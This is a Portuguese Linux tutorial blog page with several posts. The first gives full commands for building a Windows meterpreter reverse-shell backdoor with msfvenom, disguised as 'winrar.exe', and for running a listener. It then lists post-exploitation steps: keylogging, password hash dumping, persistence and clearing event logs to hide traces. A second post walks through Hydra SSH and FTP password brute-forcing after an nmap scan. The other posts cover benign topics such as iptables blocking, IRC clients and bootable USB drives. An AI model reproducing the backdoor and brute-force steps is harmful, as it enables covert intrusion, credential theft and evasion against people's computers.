Tutoriais

Tutoriais

Tutoriais prefirolinux

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777

 

Hydra – Brute Force – Realizando pequeno ataque de força bruta.

1

Bom , neste pequeno Artigo vamos entender de forma básica o funcionamento do Hydra.
Para isso, me conectei ao meu kali linux de forma remota na porta ssh e procedi com todos os passos usados para se fazer um ataque de brute force, lembrando que o fato de estar conectado via ssh não me impede de usar os programas que rodam em modo terminal, impediria de usar os pacotes que necessitem de uma interface gráfica para tal.
Bom, é importante ressaltar que estou usando um ambiente de testes, o “host alvo” é de minha propriedade e este post serve apenas paras fins de analise e estudo, não fazendo apologia a invasão. Também não me responsabilizarei por eventuais danos causados a terceiros pelo uso incorreto dessa ferramenta..

 

Aqui temos a versão do Kali que estou rodando.

Bom, o Hydra como muitos conhecem é um programa open source disponibilizado nativamente no Kali Linux, tendo também o codigo fonte disponível para download no repositório oficial do projeto. E quanto a instalação do pacote, esta não será abordada nestas minhas pequenas linhas de raciocinio.

Quem quiser saber mais sobre o Hydra pode diretamente no terminal rodar o man do programa, bastando para isso…

root@love:~# man hydra

Ele dará todas as informações necessárias para que você o conheça melhor, podendo assim planejar e executar diferentes ataques.

Neste exemplo usei como alvo uma Routerboard 433AH rodando Router OS e com usuário previamente cadastrado. Falando em hydra, é sempre interessante ter, pelo menos, o nome de usuário que será usado durante o ataque.
A senha cadastrada foi incluída no nosso arquivo de senhas, qual será usado pelo hydra para realizar os testes de login e assim verificar o password correto.

Bom, vamos ao que realmente interessa. De posse do seu Terminal, crie um arquivo onde você possa inserir prováveis senhas(veja, estamos trabalhando com prováveis senhas , aquelas que imaginamos ser usadas pelo usuario vitima do ataque.) para que possamos realizar nosso pequeno e singelo ataque.
No Terminal, crie então um arquivo, o nome pode ser qualquer um.

root@love:~# nano pass.txt

Neste arquivo insira as senhas, caso use uma lista pre definida.

 

Após termos nossa base de dados de password já pronta, vamos então verificar quais serviços o nosso host vitima está rodando, quais portas estão abertas e que possam ser testadas pelo Hydra.

root@love:~# nmap -v 10.2.2.1

Constatada as portas abertas, podemos prosseguir com nosso propósito, atacar e obter o password.
Então, vamos invocar o Hydra de forma a usar o arquivo “pass.txt” como base para as senhas.

root@love:~# hydra -l kali -P pass.txt 10.2.2.1 ssh


Explicando a linha:
Hydra: invocamos o programa a ser executado, no caso obviamente o Hydra.
O menos L minusculo “-l” especifica login(vide man hydra).
Kali= Nome do usuário a ser testado (como disse acima, user previamente cadastrador por mim)
O “-P” maiúsculo especifica um arquivo contendo senhas, caso fosse “-p” minúsculo poderíamos especificar somente um password por vez.
Pass.txt é obviamente nosso arquivo com as passwords.
10.2.2.1 é o host alvo do ataque e o SSH no final da linha indica o serviço(porta) a ser testada.

Feito isso, basta correr o comando, damos {Enter} e aguardamos que os testes se concluam. Dependendo do tamanho do seu arquivo de senhas e da complexidade isso pode demorar muito tempo… 😉

Olha, que lindo, aqui já podemos ver que o Hydra encontrou o password do usuário Kali. Isso após alguns segundos somente.

Vamos fazer um teste via ssh?

Pronto, conectado…!
Realmente funciona, e realmente da para fazer ataques de níveis bem diferentes deste, por exemplo, caso eu quisesse testar também uma serie de senhas para o protocolo(serviço ftp) bastava a mim mudar ou especificar no fim da linha onde invoco o Hydra o serviço, para um ftp teríamos:

 

root@love:~# hydra -l kali -P passftp.txt 10.2.2.1 ftp

Bom amigos, por hoje e só por hoje é só! Hehe
O hydra é um velho companheiro, e se vocẽ quiser realmente aprender sobre ele não se esqueça de ler a man do programa, não existe tutorial/artigo que se compare a qualidade das informações disponíveis lá.

Bloqueio Seletivo Whatsapp usando Iptables

0

Olá, meu nome é Thiago Ferreira e sou um dos colaboradores do PrefiroLinux, hoje mostrarei como podemos executar um bloqueio seletivo  de whatsapp e facebook usando apenas o iptables. Muito útil em ambientes onde se usa proxy transparente e não há  a possibilidade exectuar os devidos bloqueios e liberação pelas ACL’s do squid.
Aqui faremos de uma forma simples que requer apenas o conhecimento dos ips a serem bloqueados , estes se tratando da rede interna. E os ips que serão liberados, no caso apresentado os ips de nível publico.
Aqui deixo o script de forma bem simples, comentada e bem apresentado, inclusive com a notação de que cada comando fará, como o iptables tratará as regras básicas descritas.
Esse conteúdo originalmente foi incluído em minhas rotinas de bloqueio por volta de junho de 2015, após pesquisas feitas principalmente no linuxquestions.org e adaptado as minhas necessidades. Então, para futuras duvidas e buscas a base de busca deve ser o linuxquestions.
Sendo que aqui no nosso fórum temos o devido espaço para quaisquer esclarecimentos, vide;
http://forum.prefirolinux.com

As linhas são auto explicativas,  os comentários devem permanecer com o “#” antes das linhas que não são parte do script afim de evitar quaisquer erro de leitura do bash.

Criem os arquivos, bloqueio_seletivo, ipsliberados e ipsinterno

$nano /usr/share/bloqueio_seletivo
e dentro dele insira o seguinte script


Na lista de ipsliberados entre com os ips disponiveis no proprio site do whatsapp: https://www.whatsapp.com/cidr.txt .
Basta adicionar a lista a um arquivos em “/usr/share” :
$nano /usr/share/ipsliberados
Como exemplo, poderiamos ter uma serie de ips nessa ordem:

31.13.58.55
31.55.44.77
178.88.14.100

Adicione os ips, e crie um novo arquivo para inserirmos os ips da rede interna:

$nano /usr/share/ipsinterno

Em ipsinterno insiram os ips da sua rede, lembrando de seguir a seguinte regra.
Ips que serão bloqueados devem conter o “#” antes, pois o cut fará a leitura levando em consideração que esses são os unicos que devem ser tratados.
#10.10.10.44
#10.10.10.24
10.10.10.8
No caso acima, somente os dois primeiros serão bloqueados de acessar os serviços dos “ipsliberados”,  o “10.10.10.8” terá total acesso ao trafego.

Caso deseje, liste apenas os ips permitidos, sem a necessidade de usar o “#” antes do ip, ficando assim:
10.10.10.55
10.10.10.22

Aqui um exemplo do script limpo e sem comentarios…

Lembrem-se, leia todo o conteúdo do post inclusive do script para melhor entendimento.
Suporte no forum do prefirolinux.
Boa diversão

 

 

Instalação do PCBSD 10.3

0

 

PC-BSD é um sistema operacional Desktop baseado no FreeBSD.
Ao invés do usuário ter que baixar e configurar o seu próprio ambiente de trabalho o que pode ser demorado.
O PCBSD visa tornar a experiência FreeBSD fácil e viável para o usuário médio “casual”
Neste tutorial, vamos instalar o PCBSD 10.3.
Passo 1 – Transferir.
Clique Aqui para obter o PCBSD.

Passo 2 – Comece o Instalar.

Instalando “IRSSI” no kali linux cliente IRC

0

Boas Users!

Vamos instalar um cliente IRC, comunicação via terminal no kali linux.

1- abra o terminal e execute;

#apt-get install irssi

2- execute o irrsi no terminal;

#irssi

Captura de tela de 2016-07-21 01-06-40

3- Em seguida execute o comando abaixo para conectar a um servidor do irc;

/server freenode.net

OBS: usei o servidor da freenode como exemplo, você pode se conectar a qualquer servidor do IRC.

Captura de tela de 2016-07-21 01-14-52

4-Agora entraremos em uma sala ou também podemos criar uma sala se caso ela nao esteja criada, com o seguinte comando;

/join prefirolinux

Captura de tela de 2016-07-21 01-15-13

Pronto, nesse momento você certamente estará conectado a uma sala do IRC, para saber mais sobre os comandos acesse esse link e boa diversão.

 

 

By user777

 

 

 

 

 

 

 

Criando Pendrive de Boot do Linux no Mac por linha de comando

0

Boas Users!

Criaremos um pendrive de boot no OS X

1- Conecte o pendrive no Mac, e acesse um terminal pelo Spotlight (⌘ + Tecla Espaço) ou diretamente através do diretório /Applications/Utilities/

2- Execute o seguinte comando no terminal, ” diskutil list ” o retorno do comando pode variar de acordo com o Mac

$diskutil list

1

3- Identifique o disco relativo ao Pendrive, neste caso, é o disk1

2

4- Desmonte o disco, com o comando “diskutil unmountDisk

$diskutil unmountDisk /dev/disk1

3

5- Com o comando o disco esteja desmontado, você poderá acessa-lo e altera-lo à baixo nível.

Localize a imagem ISO que deseja gravar no Pendrive ou copie-a para um local de fácil “acesso”.

Para efetuar a cópia, iremos utilizar o utilitário dd, o qual já se encontra disponível no Mac OS X.

Para saber mais sobre o dd, basta consultar o Manual, digitando “man dd” no Terminal.

A sintaxe básica do dd é:

dd if=origem of=destino

6- Substitua origem e destino, pelo arquivo ISO e pelo disco de destino respectivamente, logo teremos algo semelhante à:

dd if=ubuntu-13.04-server-amd64.iso of=/dev/rdisk1 bs=128m

OBS: Note que, para acelerar o processo de cópia, complementamos o comando, definindo parâmetro block size (bs) como 128m e alteramos o disco de destino incluindo um “r” antes de “disk1“.

bs indica que os blocos de leitura e escrita devem possuir o mesmo tamanho, enquanto que o “r” define que o disco deve ser acessado no modo raw.

Quando o processo de cópia for concluído, você receberá uma mensagem informando o tempo decorrido e a quantidade de bytes transferidos.

Tudo pronto, agora basta desconectar o Pendrive e utiliza-lo.

 

By user777

Criando Pendrive de Boot Linux no Windows

0

Boas Users!

Criaremos um pendrive de boot do linux, no windows.

1- Faça o download do programa yumi, e execute-o

1

2- clique em I Agree

2

3- Selecione o pendrive, marque a opção “we will Fat32 Format D: Drive!“, clique em  “Browse” a ISO do Linux e clique em Create.

3

4

4- após o termino, clique em Next >

5

5- A seguir, o YUMI pergunta se quer adicionar outra ISO ao pendrive, se clicar em sim, fazer o mesmos processos anteriores, no nosso caso, clicaremos em não

6

6- e por último, clicamos em Finish, está pronto seu pendrive de boot do linux

7

 

By user777

Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux

0

Boas Users!

 

Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:

erro kali

 

1– esse erro ocorre geralmente, com pendrive.

2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.

3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.

4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.

5–  se estiver no linux, Primeiro acesse o terminal como root:

su

Agora vamos acessar o /media:

# cd /media

E então crie um diretório onde deverá ser armazenado a nossa ISO:

# mkdir /diretorio_ISO

Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:

# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop

 

 

By user777